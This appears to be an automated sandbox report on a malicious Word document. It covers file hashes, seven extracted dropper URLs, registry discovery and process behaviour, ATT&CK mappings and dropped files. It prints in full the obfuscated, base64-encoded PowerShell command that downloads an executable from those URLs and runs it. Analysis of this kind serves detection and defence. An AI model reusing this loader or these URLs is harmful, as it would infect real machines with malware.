23b73b6d7e3d2266bcf0c20586d750bae5d4b3e873447a95e582df8e1d31f945

General

Target

d4a0e4cc2ab67c5c54007bd93eaa75fb_JaffaCakes118.doc
Size

161KB
MD5

d4a0e4cc2ab67c5c54007bd93eaa75fb
SHA1

e0c439b3573dcb46315071ebd536d3a7d72185b7
SHA256

23b73b6d7e3d2266bcf0c20586d750bae5d4b3e873447a95e582df8e1d31f945
SHA512

a3374338287646f0384eb43cedf9941f95d5bb783eadd7cb3f4a1579239a26bdbf1b760bfb36257068ca3d56227521a7c65b956012fd8cdab17c001af51f2d3b
SSDEEP

1536:Brdi1Ir77zOH98Wj2gpngR+a9hGPrPkNFLCAGx:BrfrzOH98ipgtGPgN5BGx

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://hoagietesting10.com/wp-content/SJ/

exe.dropper

http://degepro.com/eTrac/s9/

exe.dropper

http://hbprivileged.com/info/rp/

exe.dropper

https://shoyannutrition.com/wp-includes/B4e/

exe.dropper

https://ictsmkn2cibar.org/cgi-bin/N/

exe.dropper

https://povedavicedo.com/wp-admin/d/

exe.dropper

http://mbsolutions.ge/wp-admin/eRY/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4528	1360	powershell.exe	82

Blocklisted process makes network request 5 IoCs

flow	pid	Process
24	4528	powershell.exe
26	4528	powershell.exe
59	4528	powershell.exe
61	4528	powershell.exe
65	4528	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3664	WINWORD.EXE
3664	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4528	powershell.exe
4528	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4528	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3664	WINWORD.EXE
3664	WINWORD.EXE
3664	WINWORD.EXE
3664	WINWORD.EXE
3664	WINWORD.EXE
3664	WINWORD.EXE
3664	WINWORD.EXE
3664	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d4a0e4cc2ab67c5c54007bd93eaa75fb_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encod JABFAGwAeABxADkAeABpAD0AKAAnAEEAbgAnACsAKAAnADIAcgA2ACcAKwAnADIAYwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAGUAcgBQAFIAbwBGAGkAbABFAFwAcABSAGgAWAB1AEsAUQBcAG8ANQBlADEAcABTAGUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIARQBDAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQByAGkAdABgAHkAUAByAGAAbwB0AG8AYABDAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzADEAMgAsACcAKwAnACAAdAAnACsAJwBsAHMAJwApACsAKAAnADEAMQAsACAAJwArACcAdABsACcAKQArACcAcwAnACkAOwAkAFcAYQA0ADkAbwA2ADUAIAA9ACAAKAAoACcAQwAnACsAJwB5AG8AJwApACsAKAAnAHMAJwArACcAZQB5ACcAKQArACgAJwBhAGwAJwArACcAbgAnACkAKQA7ACQARwB4ADQAaQBpAG4ANwA9ACgAJwBUACcAKwAoACcAYwBoAG8AJwArACcAdQAnACsAJwAwAGoAJwApACkAOwAkAFAANQBoADQAcgA5ADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcASQBXACcAKwAoACcARgBQACcAKwAnAHIAaAB4ACcAKQArACcAdQAnACsAJwBrAHEAJwArACgAJwBJACcAKwAnAFcARgAnACsAJwBPADUAZQAxAHAAJwApACsAJwBzACcAKwAoACcAZQAnACsAJwBJAFcARgAnACkAKQAuACIAcgBlAFAAbABBAGAAQwBlACIAKAAoAFsAQwBIAEEAUgBdADcAMwArAFsAQwBIAEEAUgBdADgANwArAFsAQwBIAEEAUgBdADcAMAApACwAWwBzAHQAcgBJAE4ARwBdAFsAQwBIAEEAUgBdADkAMgApACkAKwAkAFcAYQA0ADkAbwA2ADUAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABRAGcAdQBfAGkANAAzAD0AKAAnAFEAMwAnACsAKAAnAGQAeAAnACsAJwAwACcAKQArACcAcwBsACcAKQA7ACQASwBzADcAaQBqAGYAcQA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgBXAEUAQgBjAEwAaQBFAE4AdAA7ACQATQBfAGEAdgByAHkAegA9ACgAJwBoACcAKwAoACcAdAB0AHAAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGgAbwBhACcAKQArACcAZwAnACsAJwBpAGUAJwArACgAJwB0AGUAJwArACcAcwB0ACcAKwAnAGkAbgAnACkAKwAoACcAZwAnACsAJwAxADAALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtACcAKwAnAGMAJwArACgAJwBvAG4AdAAnACsAJwBlAG4AJwApACsAJwB0ACcAKwAoACcALwBTAEoAJwArACcALwAnACsAJwAqAGgAdAB0AHAAJwApACsAKAAnADoALwAvAGQAZQAnACsAJwBnAGUAJwApACsAJwBwAHIAJwArACgAJwBvAC4AJwArACcAYwBvAG0AJwArACcALwBlAFQAcgBhAGMAJwApACsAKAAnAC8AJwArACcAcwA5ACcAKQArACgAJwAvACoAJwArACcAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKwAnAC8AaABiAHAAcgBpAHYAJwApACsAJwBpACcAKwAoACcAbAAnACsAJwBlAGcAJwApACsAJwBlACcAKwAnAGQAJwArACgAJwAuAGMAbwAnACsAJwBtAC8AJwApACsAJwBpACcAKwAoACcAbgBmAG8AJwArACcALwByAHAAJwApACsAKAAnAC8AKgBoACcAKwAnAHQAJwApACsAKAAnAHQAcABzACcAKwAnADoAJwApACsAJwAvACcAKwAnAC8AJwArACgAJwBzAGgAbwB5ACcAKwAnAGEAJwArACcAbgBuAHUAdAAnACsAJwByACcAKwAnAGkAdABpAG8AbgAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAHcAcAAtAGkAbgBjAGwAdQBkACcAKwAnAGUAcwAvAEIAJwArACcANABlACcAKQArACgAJwAvACoAaAAnACsAJwB0AHQAcABzADoALwAvAGkAJwArACcAYwB0AHMAbQAnACsAJwBrAG4AMgBjACcAKQArACgAJwBpACcAKwAnAGIAYQAnACkAKwAoACcAcgAnACsAJwAuAG8AcgBnAC8AJwApACsAKAAnAGMAJwArACcAZwAnACsAJwBpAC0AYgBpAG4AJwApACsAKAAnAC8ATgAnACsAJwAvACoAaAAnACkAKwAoACcAdAB0AHAAcwA6AC8AJwArACcALwAnACsAJwBwAG8AdgBlACcAKQArACcAZABhACcAKwAoACcAdgBpAGMAZQBkAG8ALgBjAG8AJwArACcAbQAvAHcAJwArACcAcAAtACcAKwAnAGEAZAAnACsAJwBtACcAKwAnAGkAJwApACsAKAAnAG4ALwAnACsAJwBkACcAKQArACcALwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBtACcAKwAnAGIAcwBvAGwAJwApACsAJwB1ACcAKwAoACcAdABpACcAKwAnAG8AJwApACsAJwBuACcAKwAoACcAcwAnACsAJwAuAGcAJwApACsAKAAnAGUALwAnACsAJwB3ACcAKQArACcAcAAtACcAKwAnAGEAJwArACgAJwBkACcAKwAnAG0AaQBuACcAKQArACgAJwAvAGUAJwArACcAUgBZAC8AJwApACkALgAiAHMAUABMAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQwA0AG8AdgAyADMAZQA9ACgAKAAnAFAAZQAnACsAJwBfAF8AdgAnACsAJwAxACcAKQArACcAZAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABRADkAZwBfAF8AbQBsACAAaQBuACAAJABNAF8AYQB2AHIAeQB6ACkAewB0AHIAeQB7ACQASwBzADcAaQBqAGYAcQAuACIARABPAGAAdwBgAE4ATABgAE8AYQBkAEYAaQBsAGUAIgAoACQAUQA5AGcAXwBfAG0AbAAsACAAJABQADUAaAA0AHIAOQAwACkAOwAkAEcAcwBiADUAMgBvADkAPQAoACcAVwAnACsAKAAnAHEAdwByAGsAJwArACcAagAyACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFAANQBoADQAcgA5ADAAKQAuACIAbABgAGUAbgBnAFQAaAAiACAALQBnAGUAIAAyADQAOQA0ADMAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAoACQAUAA1AGgANAByADkAMAApADsAJABXAGsAMwB1AHkANwA2AD0AKAAoACcARgBuAGQANQAnACsAJwAzACcAKQArACcAMwA4ACcAKQA7AGIAcgBlAGEAawA7ACQAUgBuAHIAcQByAHYAMQA9ACgAKAAnAFkAMQBrAGcAJwArACcAeQAnACkAKwAnAGQAJwArACcAbQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAaQB6AHEAbQA3AHcAPQAoACcARgAzACcAKwAoACcAdQBhACcAKwAnADUAeAAnACkAKwAnAGMAJwApAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDFB23.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_et2ugwld.ijm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
45ef59ec422f323dede105987431918d

SHA1
7f9e822db20149e40ba9813e3ebce8bee0418edb

SHA256
3d8fccb4f47c6aaab1a5c2f99f29aa2868a855acdbb6fc8c2ca97876701e0772

SHA512
1dfe3ab86d8112b04632d2276a677a36f8640e856e8ef4b3a0405cd806a2977d950b9a82e0eca96a3ee039e6a3314434f3fb28f3e45600e29bba904c2e8f52e6

Download Submit
C:\Users\Admin\pRhXuKQ\o5e1pSe\Cyoseyaln.exe

Filesize
208KB

MD5
ae7ad93489b925ae03dd45594eced727

SHA1
03392bfda60f34003809147d44de358f77b0d97f

SHA256
612160e2584eda5b586e6d88bdc4b80679ba996dd99b244e76eff3072c121e16

SHA512
a2768b78e36aa442431bdabb06e1f88e360dd8fc775536e166ca7694968d129b1a7bbc7f0305e2b9f51e985d850c622e9e17ac5e3d9d618c357ce1519b20e081

Download Submit
memory/3664-10-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-7-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-8-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-12-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-13-0x00007FF9A6E10000-0x00007FF9A6E20000-memory.dmp

Filesize
64KB

Download
memory/3664-11-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-3-0x00007FF9E8F2D000-0x00007FF9E8F2E000-memory.dmp

Filesize
4KB

Download
memory/3664-16-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-17-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-18-0x00007FF9A6E10000-0x00007FF9A6E20000-memory.dmp

Filesize
64KB

Download
memory/3664-15-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-14-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-9-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-5-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-4-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-27-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-59-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-28-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-101-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-60-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-279-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-6-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-88-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-89-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-90-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-91-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-2-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-100-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-58-0x00007FF9E8E90000-0x00007FF9E9085000-memory.dmp

Filesize
2.0MB

Download
memory/3664-0-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-1-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-275-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-276-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-278-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/3664-277-0x00007FF9A8F10000-0x00007FF9A8F20000-memory.dmp

Filesize
64KB

Download
memory/4528-84-0x000001CAEB400000-0x000001CAEB422000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads